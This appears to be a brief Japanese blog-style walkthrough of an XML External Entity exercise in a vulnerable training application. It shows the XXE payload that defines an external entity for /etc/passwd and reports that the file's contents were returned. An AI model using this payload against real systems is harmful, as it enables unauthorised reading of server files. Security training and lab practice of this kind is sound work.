Hello there,

 

OWASP 2017 ⇨ A4 ⇨ XML External Entity Injection ⇨ XML Validatorを選択して。

 

 

このページは、XMLをうけつけるようで。

下記のサンプルを入力してみると。

　<somexml><message>Hello World</message></somexml>

 

 

ちなみにXMLのリクエストヘッダーは以下のような感じ。

 

 

そして、下記のようにエンティティを実行すると。

ファイルの中身が表示できた。

　<?xml version="1.0"?>
　<!DOCTYPE foo [
　　<!ELEMENT bar ANY>
　　<!ENTITY file SYSTEM "/etc/passwd">
　]>
　<bar>&file;</bar>

 

 

Best regards,